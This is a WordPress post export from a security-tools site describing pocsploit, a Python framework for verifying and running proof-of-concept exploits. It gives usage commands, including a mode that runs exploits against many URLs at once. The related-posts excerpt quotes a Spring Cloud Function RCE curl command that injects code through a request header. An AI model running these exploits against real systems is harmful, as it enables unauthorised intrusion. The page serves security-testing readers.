{"id":25758,"date":"2022-07-01T11:47:38","date_gmt":"2022-07-01T11:47:38","guid":{"rendered":"https:\/\/kalilinuxtutorials.com\/?p=25758"},"modified":"2022-07-01T11:47:41","modified_gmt":"2022-07-01T11:47:41","slug":"pocsploit","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/pocsploit\/","title":{"rendered":"Pocsploit : A Lightweight, Flexible And Novel Open Source Poc Verification Framework"},"content":{"rendered":"\n<p><strong>pocsploit<\/strong> is a lightweight, flexible and novel open source poc verification framework.<\/p>\n\n\n\n<h2 class=\"has-light-green-cyan-background-color has-background wp-block-heading\">Pain points of the POC framework in the market<\/h2>\n\n\n\n<ul class=\"wp-block-list\"><li>There are too many params, I don&#8217;t know how to get started, but only some of them are commonly used.<\/li><li>YAML poc framework(like nuclei &amp; xray) is not flexible enough. the conversion cost is very high when writing poc. Sometimes it&#8217;s hard when encountering non-http protocols. (only hex can be used)<\/li><li>Sometimes POC has false positives, which can be avoided by accurate fingerprint matching.<\/li><li>It is heavily dependent on the framework. Poc in pocsploit can be used in the framework and can also be used alone.<\/li><\/ul>\n\n\n\n<h2 class=\"has-light-green-cyan-background-color has-background wp-block-heading\"><a href=\"https:\/\/github.com\/cckuailong\/pocsploit#advantages-of-pocsploit\"><\/a>Advantages of pocsploit<\/h2>\n\n\n\n<ul class=\"wp-block-list\"><li>Lighter, does not depend on the framework, a single poc can run<\/li><li>Easier to rewrite Poc<\/li><li>More flexible (compared to nuclei, xray, goby, etc.)<\/li><li>Fewer false positives, providing fingerprint prerequisite judgment, you can first judge whether the site has the fingerprint of a certain component, and then perform POC verification, which is more accurate<\/li><li>There are many ways to use, providing poc \/ exp<\/li><li>Detailed vulnerability information display<\/li><li>Poc ecological sustainability: I will continue to update the Poc to modules\/, and welcome everyone to join us&nbsp;Contribute Poc<\/li><\/ul>\n\n\n\n<p>Encountered code\/poc issues, please&nbsp;Submit issue<\/p>\n\n\n\n<h2 class=\"has-light-green-cyan-background-color has-background wp-block-heading\"><a href=\"https:\/\/github.com\/cckuailong\/pocsploit#poc-statistics\"><\/a>Poc Statistics<\/h2>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>cve<\/th><th>cnnvd<\/th><th>others<\/th><\/tr><\/thead><tbody><tr><td>345<\/td><td>7<\/td><td>102<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h2 class=\"has-text-align-center has-vivid-green-cyan-background-color has-background wp-block-heading\"><a href=\"https:\/\/github.com\/cckuailong\/pocsploit#usage\"><\/a>Usage<\/h2>\n\n\n\n<h3 class=\"has-light-green-cyan-background-color has-background wp-block-heading\"><a href=\"https:\/\/github.com\/cckuailong\/pocsploit#install-requirements\"><\/a>Install requirements<\/h3>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>pip3 install -r requirements.txt<\/strong><\/p>\n\n\n\n<p>poc to verify single website<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>python3 pocsploit.py -iS &#8220;http:\/\/xxxx\/&#8221; -r &#8220;modules\/&#8221; -t 100 &#8211;poc<\/strong><\/p>\n\n\n\n<p>specific poc<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>python3 pocslpoit.py -iS &#8220;http:\/\/xxxxx&#8221; -r &#8220;modules\/vulnerabilities\/thinkphp\/thinkphp-5022-rce.py&#8221; &#8211;poc<\/strong><\/p>\n\n\n\n<p>exp to exploit many websites (with urls in a file)<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>python3 pocslpoit.py -iF &#8220;urls.txt&#8221; -r &#8220;modules\/vulnerabilities\/&#8221; &#8211;exp<\/strong><\/p>\n\n\n\n<p>Output to file &amp; console quiet mode<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>python3 pocslpoit.py -iS &#8220;http:\/\/xxxx&#8221; -r &#8220;modules\/vulnerabilities\/&#8221; &#8211;poc -o result\/result.log -q<\/strong><\/p>\n\n\n\n<div class=\"wp-block-buttons is-content-justification-center is-layout-flex wp-container-core-buttons-is-layout-16018d1d wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button is-style-outline is-style-outline--1\"><a class=\"wp-block-button__link has-vivid-cyan-blue-background-color has-background\" href=\"https:\/\/github.com\/cckuailong\/pocsploit\"><strong>Download<\/strong><\/a><\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>pocsploit is a lightweight, flexible and novel open source poc verification framework. Pain points of the POC framework in the market There are too many params, I don&#8217;t know how to get started, but only some of them are commonly used. YAML poc framework(like nuclei &amp; xray) is not flexible enough. the conversion cost is [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":25767,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgaUUvFOmoyw7N5SxHQKLaorEbVY6daMLFvLRc3VUJSxhGJ5652MQsrqD7l30fUgvGpCgnxQzJp1bY4I2nv5fZ75lbS3R13HNbvCennTDIYbDMQQ8Wap2x-HJNT3vePAtuYhJFE7DF60Lb6ahlGHe0Opbpgvsx2FCHwjacuM-Mr92F7anplK-6Cvo4C\/s728\/logo%20(1).png","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[5392,4868,2544,5391],"class_list":["post-25758","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kali","tag-flexible","tag-lightweight","tag-poc","tag-pocsploit"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Pocsploit : A Lightweight, Flexible And Novel Open Source Poc Verification<\/title>\n<meta name=\"description\" content=\"pocsploit is a lightweight, flexible and novel open source poc verification framework. There are too many params, I don&#039;t know how to get .\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/pocsploit\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Pocsploit : A Lightweight, Flexible And Novel Open Source Poc Verification\" \/>\n<meta property=\"og:description\" content=\"pocsploit is a lightweight, flexible and novel open source poc verification framework. There are too many params, I don&#039;t know how to get .\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/pocsploit\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2022-07-01T11:47:38+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-07-01T11:47:41+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgaUUvFOmoyw7N5SxHQKLaorEbVY6daMLFvLRc3VUJSxhGJ5652MQsrqD7l30fUgvGpCgnxQzJp1bY4I2nv5fZ75lbS3R13HNbvCennTDIYbDMQQ8Wap2x-HJNT3vePAtuYhJFE7DF60Lb6ahlGHe0Opbpgvsx2FCHwjacuM-Mr92F7anplK-6Cvo4C\/s728\/logo%20(1).png\" \/>\n<meta name=\"author\" content=\"R K\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgaUUvFOmoyw7N5SxHQKLaorEbVY6daMLFvLRc3VUJSxhGJ5652MQsrqD7l30fUgvGpCgnxQzJp1bY4I2nv5fZ75lbS3R13HNbvCennTDIYbDMQQ8Wap2x-HJNT3vePAtuYhJFE7DF60Lb6ahlGHe0Opbpgvsx2FCHwjacuM-Mr92F7anplK-6Cvo4C\/s728\/logo%20(1).png\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R K\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/pocsploit\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/pocsploit\/\"},\"author\":{\"name\":\"R K\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\"},\"headline\":\"Pocsploit : A Lightweight, Flexible And Novel Open Source Poc Verification Framework\",\"datePublished\":\"2022-07-01T11:47:38+00:00\",\"dateModified\":\"2022-07-01T11:47:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/pocsploit\/\"},\"wordCount\":307,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/pocsploit\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgaUUvFOmoyw7N5SxHQKLaorEbVY6daMLFvLRc3VUJSxhGJ5652MQsrqD7l30fUgvGpCgnxQzJp1bY4I2nv5fZ75lbS3R13HNbvCennTDIYbDMQQ8Wap2x-HJNT3vePAtuYhJFE7DF60Lb6ahlGHe0Opbpgvsx2FCHwjacuM-Mr92F7anplK-6Cvo4C\/s728\/logo%20(1).png\",\"keywords\":[\"Flexible\",\"Lightweight\",\"POC\",\"Pocsploit\"],\"articleSection\":[\"Kali Linux\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/pocsploit\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/pocsploit\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/pocsploit\/\",\"name\":\"Pocsploit : A Lightweight, Flexible And Novel Open Source Poc Verification\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/pocsploit\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/pocsploit\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgaUUvFOmoyw7N5SxHQKLaorEbVY6daMLFvLRc3VUJSxhGJ5652MQsrqD7l30fUgvGpCgnxQzJp1bY4I2nv5fZ75lbS3R13HNbvCennTDIYbDMQQ8Wap2x-HJNT3vePAtuYhJFE7DF60Lb6ahlGHe0Opbpgvsx2FCHwjacuM-Mr92F7anplK-6Cvo4C\/s728\/logo%20(1).png\",\"datePublished\":\"2022-07-01T11:47:38+00:00\",\"dateModified\":\"2022-07-01T11:47:41+00:00\",\"description\":\"pocsploit is a lightweight, flexible and novel open source poc verification framework. There are too many params, I don't know how to get .\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/pocsploit\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/pocsploit\/#primaryimage\",\"url\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgaUUvFOmoyw7N5SxHQKLaorEbVY6daMLFvLRc3VUJSxhGJ5652MQsrqD7l30fUgvGpCgnxQzJp1bY4I2nv5fZ75lbS3R13HNbvCennTDIYbDMQQ8Wap2x-HJNT3vePAtuYhJFE7DF60Lb6ahlGHe0Opbpgvsx2FCHwjacuM-Mr92F7anplK-6Cvo4C\/s728\/logo%20(1).png\",\"contentUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgaUUvFOmoyw7N5SxHQKLaorEbVY6daMLFvLRc3VUJSxhGJ5652MQsrqD7l30fUgvGpCgnxQzJp1bY4I2nv5fZ75lbS3R13HNbvCennTDIYbDMQQ8Wap2x-HJNT3vePAtuYhJFE7DF60Lb6ahlGHe0Opbpgvsx2FCHwjacuM-Mr92F7anplK-6Cvo4C\/s728\/logo%20(1).png\",\"width\":\"728\",\"height\":\"380\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\",\"name\":\"R K\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"caption\":\"R K\"},\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Pocsploit : A Lightweight, Flexible And Novel Open Source Poc Verification","description":"pocsploit is a lightweight, flexible and novel open source poc verification framework. There are too many params, I don't know how to get .","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/pocsploit\/","og_locale":"en_US","og_type":"article","og_title":"Pocsploit : A Lightweight, Flexible And Novel Open Source Poc Verification","og_description":"pocsploit is a lightweight, flexible and novel open source poc verification framework. There are too many params, I don't know how to get .","og_url":"https:\/\/kalilinuxtutorials.com\/pocsploit\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2022-07-01T11:47:38+00:00","article_modified_time":"2022-07-01T11:47:41+00:00","og_image":[{"url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgaUUvFOmoyw7N5SxHQKLaorEbVY6daMLFvLRc3VUJSxhGJ5652MQsrqD7l30fUgvGpCgnxQzJp1bY4I2nv5fZ75lbS3R13HNbvCennTDIYbDMQQ8Wap2x-HJNT3vePAtuYhJFE7DF60Lb6ahlGHe0Opbpgvsx2FCHwjacuM-Mr92F7anplK-6Cvo4C\/s728\/logo%20(1).png","type":"","width":"","height":""}],"author":"R K","twitter_card":"summary_large_image","twitter_image":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgaUUvFOmoyw7N5SxHQKLaorEbVY6daMLFvLRc3VUJSxhGJ5652MQsrqD7l30fUgvGpCgnxQzJp1bY4I2nv5fZ75lbS3R13HNbvCennTDIYbDMQQ8Wap2x-HJNT3vePAtuYhJFE7DF60Lb6ahlGHe0Opbpgvsx2FCHwjacuM-Mr92F7anplK-6Cvo4C\/s728\/logo%20(1).png","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"R K","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/pocsploit\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/pocsploit\/"},"author":{"name":"R K","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad"},"headline":"Pocsploit : A Lightweight, Flexible And Novel Open Source Poc Verification Framework","datePublished":"2022-07-01T11:47:38+00:00","dateModified":"2022-07-01T11:47:41+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/pocsploit\/"},"wordCount":307,"commentCount":0,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/pocsploit\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgaUUvFOmoyw7N5SxHQKLaorEbVY6daMLFvLRc3VUJSxhGJ5652MQsrqD7l30fUgvGpCgnxQzJp1bY4I2nv5fZ75lbS3R13HNbvCennTDIYbDMQQ8Wap2x-HJNT3vePAtuYhJFE7DF60Lb6ahlGHe0Opbpgvsx2FCHwjacuM-Mr92F7anplK-6Cvo4C\/s728\/logo%20(1).png","keywords":["Flexible","Lightweight","POC","Pocsploit"],"articleSection":["Kali Linux"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/kalilinuxtutorials.com\/pocsploit\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/pocsploit\/","url":"https:\/\/kalilinuxtutorials.com\/pocsploit\/","name":"Pocsploit : A Lightweight, Flexible And Novel Open Source Poc Verification","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/pocsploit\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/pocsploit\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgaUUvFOmoyw7N5SxHQKLaorEbVY6daMLFvLRc3VUJSxhGJ5652MQsrqD7l30fUgvGpCgnxQzJp1bY4I2nv5fZ75lbS3R13HNbvCennTDIYbDMQQ8Wap2x-HJNT3vePAtuYhJFE7DF60Lb6ahlGHe0Opbpgvsx2FCHwjacuM-Mr92F7anplK-6Cvo4C\/s728\/logo%20(1).png","datePublished":"2022-07-01T11:47:38+00:00","dateModified":"2022-07-01T11:47:41+00:00","description":"pocsploit is a lightweight, flexible and novel open source poc verification framework. There are too many params, I don't know how to get .","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/pocsploit\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/pocsploit\/#primaryimage","url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgaUUvFOmoyw7N5SxHQKLaorEbVY6daMLFvLRc3VUJSxhGJ5652MQsrqD7l30fUgvGpCgnxQzJp1bY4I2nv5fZ75lbS3R13HNbvCennTDIYbDMQQ8Wap2x-HJNT3vePAtuYhJFE7DF60Lb6ahlGHe0Opbpgvsx2FCHwjacuM-Mr92F7anplK-6Cvo4C\/s728\/logo%20(1).png","contentUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgaUUvFOmoyw7N5SxHQKLaorEbVY6daMLFvLRc3VUJSxhGJ5652MQsrqD7l30fUgvGpCgnxQzJp1bY4I2nv5fZ75lbS3R13HNbvCennTDIYbDMQQ8Wap2x-HJNT3vePAtuYhJFE7DF60Lb6ahlGHe0Opbpgvsx2FCHwjacuM-Mr92F7anplK-6Cvo4C\/s728\/logo%20(1).png","width":"728","height":"380"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad","name":"R K","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","caption":"R K"},"url":"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/"}]}},"jetpack_featured_media_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgaUUvFOmoyw7N5SxHQKLaorEbVY6daMLFvLRc3VUJSxhGJ5652MQsrqD7l30fUgvGpCgnxQzJp1bY4I2nv5fZ75lbS3R13HNbvCennTDIYbDMQQ8Wap2x-HJNT3vePAtuYhJFE7DF60Lb6ahlGHe0Opbpgvsx2FCHwjacuM-Mr92F7anplK-6Cvo4C\/s728\/logo%20(1).png","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":2953,"url":"https:\/\/kalilinuxtutorials.com\/heaphopper\/","url_meta":{"origin":25758,"position":0},"title":"HeapHopper &#8211; A Bounded Model Checking Framework For Heap-Implementations","author":"R K","date":"October 8, 2018","format":false,"excerpt":"HeapHopper is a bounded model checking framework for Heap-implementation.\u00a0 HeapHopper\u00a0Setup sudo apt update && sudo apt install build-essential python-dev virtualenvwrapper git clone https:\/\/github.com\/angr\/heaphopper.git && cd .\/heaphopper mkvirtualenv -ppython2 heaphopper pip install -e . Required Packages build-essential python-dev virtualenvwrapper Required Python-Packages ana angr cle claripy IPython psutil pyelftools pyyaml Also ReadDarkSpiritz\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/04\/button_download.png?resize=350%2C200&ssl=1","width":350,"height":200},"classes":[]},{"id":4544,"url":"https:\/\/kalilinuxtutorials.com\/pocsuite3-open-sourced-remote-vulnerability\/","url_meta":{"origin":25758,"position":1},"title":"Pocsuite3 : Open-Sourced Remote Vulnerability Testing Framework","author":"R K","date":"April 10, 2019","format":false,"excerpt":"Pocsuite3 is an open-sourced remote vulnerability testing framework developed by the Knownsec 404 Team. It comes with a powerful proof-of-concept engine, many powerful features for the ultimate penetration testers and security researchers. Features PoC scripts can running with\u00a0attack,verify,\u00a0shell\u00a0mode in different wayPlugin ecosystemDynamic loading PoC script from any where (local file,\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":10263,"url":"https:\/\/kalilinuxtutorials.com\/tentacle\/","url_meta":{"origin":25758,"position":2},"title":"Tentacle : A POC Vulnerability Verification &#038; Exploit Framework","author":"R K","date":"April 15, 2020","format":false,"excerpt":"Tentacle is a POC vulnerability verification and exploit framework. It supports free extension of exploits and uses POC scripts. It supports calls to zoomeye, fofa, shodan and other APIs to perform bulk vulnerability verification for multiple targets. Install pip3 install -r requestment.txt Also Read - DigiTrack : Attacks For $5\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":30121,"url":"https:\/\/kalilinuxtutorials.com\/scan4all\/","url_meta":{"origin":25758,"position":3},"title":"Scan4All:  A Next-Gen Automated Vulnerability Detection Security Tool","author":"Varshini","date":"September 8, 2023","format":false,"excerpt":"Scan4All is at the vanguard of modern cybersecurity solutions, offering a comprehensive suite of tools for automated vulnerability detection and threat analysis. Built on a robust Golang framework, this cross-platform toolkit seamlessly integrates with various systems, elevating the standard for next-generation security measures. Features What Is Scan4all: integrated vscan, nuclei,\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjT1JhArgfgzgMruJgxUwlBMyBWFcELv7Y-G66KK_9ibf_GAMBFGmiws_qDGdadn12pzHS2mNK8truyMUPCfaO2x69clrlcMPTjeDiWKfBkaMaqsk5ERA2glyuJ6bBo1G1S_NcRung5aW9doRUWJ4ZumnKFB4YKvslC-qtPZNdnBCeDYsPn9XglH1ts9A\/s16000\/Scan4All.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjT1JhArgfgzgMruJgxUwlBMyBWFcELv7Y-G66KK_9ibf_GAMBFGmiws_qDGdadn12pzHS2mNK8truyMUPCfaO2x69clrlcMPTjeDiWKfBkaMaqsk5ERA2glyuJ6bBo1G1S_NcRung5aW9doRUWJ4ZumnKFB4YKvslC-qtPZNdnBCeDYsPn9XglH1ts9A\/s16000\/Scan4All.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjT1JhArgfgzgMruJgxUwlBMyBWFcELv7Y-G66KK_9ibf_GAMBFGmiws_qDGdadn12pzHS2mNK8truyMUPCfaO2x69clrlcMPTjeDiWKfBkaMaqsk5ERA2glyuJ6bBo1G1S_NcRung5aW9doRUWJ4ZumnKFB4YKvslC-qtPZNdnBCeDYsPn9XglH1ts9A\/s16000\/Scan4All.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjT1JhArgfgzgMruJgxUwlBMyBWFcELv7Y-G66KK_9ibf_GAMBFGmiws_qDGdadn12pzHS2mNK8truyMUPCfaO2x69clrlcMPTjeDiWKfBkaMaqsk5ERA2glyuJ6bBo1G1S_NcRung5aW9doRUWJ4ZumnKFB4YKvslC-qtPZNdnBCeDYsPn9XglH1ts9A\/s16000\/Scan4All.webp?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":24446,"url":"https:\/\/kalilinuxtutorials.com\/cve-2022-22963\/","url_meta":{"origin":25758,"position":4},"title":"CVE-2022-22963 : PoC Spring Java Framework 0-day Remote Code Execution Vulnerability","author":"R K","date":"May 19, 2022","format":false,"excerpt":"CVE-2022-22963 is to run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example: docker run -it -d -p 8080:8080 bobcheat\/springboot-public Exploit Curl command: curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\\\"touch \/tmp\/test\")' --data-binary $'exploit_poc' $'http:\/\/192.168.1.2:8080\/functionRouter' Or using Burp suite: Download","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali 